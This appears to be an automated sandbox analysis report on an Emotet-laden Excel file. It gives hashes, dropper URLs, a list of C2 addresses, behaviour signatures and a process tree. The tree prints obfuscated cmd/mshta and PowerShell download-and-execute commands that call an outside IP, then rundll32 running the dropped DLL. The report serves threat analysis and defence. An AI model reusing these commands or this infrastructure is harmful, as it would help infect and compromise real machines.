Analysis

  • max time kernel
    112s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 00:40

General

  • Target

    Electronic form.xls

  • Size

    47KB

  • MD5

    22705643f9d87c2e5cae9ecd290580d4

  • SHA1

    0b5d34f421759a40b9e431704167d69bf3ca0c5e

  • SHA256

    710ea5dddb84bb64f7ab8b90c028da8d6ff072944c33731ee35fe89924861a3b

  • SHA512

    be9e557f629dd5666a89b3547c382bd65dce1719e4d5a2eaf2f2900139259dd4351207ca932987b78161a0adef5c199e6865d2a2692aac5dd9cb9f0da7357762

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Electronic form.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3232
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2576
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3280
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:3420
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sldsopwxbz\wjiypz.fur",LmzuymoYXAF
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1424
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sldsopwxbz\wjiypz.fur",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:404
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3232 -s 1700
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3116

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    05f1c903564b2e59389a1f99b368784d

    SHA1

    be2d7e1f8672f67c01f4a2b72afc4197cc54598e

    SHA256

    758dc46618af21e758b1fe8d09d5007b038d472f7b899f76cad47e146895dc9d

    SHA512

    e5dcb59dc392d2d64f3d6b40546a8a57189c6c8df669528a83a41a501f37d5c361f882a548f6dd635ffe2200299a88bd31db1fbc7b17bf6d72b329f9b8a6eff7

  • \ProgramData\QWER.dll
    MD5

    05f1c903564b2e59389a1f99b368784d

    SHA1

    be2d7e1f8672f67c01f4a2b72afc4197cc54598e

    SHA256

    758dc46618af21e758b1fe8d09d5007b038d472f7b899f76cad47e146895dc9d

    SHA512

    e5dcb59dc392d2d64f3d6b40546a8a57189c6c8df669528a83a41a501f37d5c361f882a548f6dd635ffe2200299a88bd31db1fbc7b17bf6d72b329f9b8a6eff7

  • \ProgramData\QWER.dll
    MD5

    05f1c903564b2e59389a1f99b368784d

    SHA1

    be2d7e1f8672f67c01f4a2b72afc4197cc54598e

    SHA256

    758dc46618af21e758b1fe8d09d5007b038d472f7b899f76cad47e146895dc9d

    SHA512

    e5dcb59dc392d2d64f3d6b40546a8a57189c6c8df669528a83a41a501f37d5c361f882a548f6dd635ffe2200299a88bd31db1fbc7b17bf6d72b329f9b8a6eff7

  • memory/404-614-0x0000000004FA0000-0x0000000004FC5000-memory.dmp
    Filesize

    148KB

  • memory/1424-610-0x0000000004CC0000-0x0000000004CE5000-memory.dmp
    Filesize

    148KB

  • memory/2620-121-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-129-0x00007FFB00DC0000-0x00007FFB00DD0000-memory.dmp
    Filesize

    64KB

  • memory/2620-656-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-655-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-654-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-653-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-128-0x00007FFB00DC0000-0x00007FFB00DD0000-memory.dmp
    Filesize

    64KB

  • memory/2620-115-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-118-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-117-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/2620-116-0x00007FFB04400000-0x00007FFB04410000-memory.dmp
    Filesize

    64KB

  • memory/3280-593-0x00000000046E0000-0x0000000004705000-memory.dmp
    Filesize

    148KB

  • memory/3420-606-0x0000000005660000-0x0000000005685000-memory.dmp
    Filesize

    148KB

  • memory/3420-600-0x00000000054C0000-0x00000000054E5000-memory.dmp
    Filesize

    148KB

  • memory/3420-602-0x00000000055A0000-0x00000000055C5000-memory.dmp
    Filesize

    148KB

  • memory/3420-604-0x0000000005600000-0x0000000005625000-memory.dmp
    Filesize

    148KB

  • memory/3420-598-0x00000000053E0000-0x0000000005405000-memory.dmp
    Filesize

    148KB

  • memory/3420-609-0x0000000005830000-0x0000000005855000-memory.dmp
    Filesize

    148KB

  • memory/3928-551-0x000001EF91A50000-0x000001EF91B62000-memory.dmp
    Filesize

    1.1MB

  • memory/3928-326-0x000001EFAA530000-0x000001EFAA5A6000-memory.dmp
    Filesize

    472KB

  • memory/3928-299-0x000001EFAA210000-0x000001EFAA24C000-memory.dmp
    Filesize

    240KB

  • memory/3928-280-0x000001EF91A50000-0x000001EF91B62000-memory.dmp
    Filesize

    1.1MB

  • memory/3928-279-0x000001EF91A50000-0x000001EF91B62000-memory.dmp
    Filesize

    1.1MB

  • memory/3928-274-0x000001EFA9E50000-0x000001EFA9E72000-memory.dmp
    Filesize

    136KB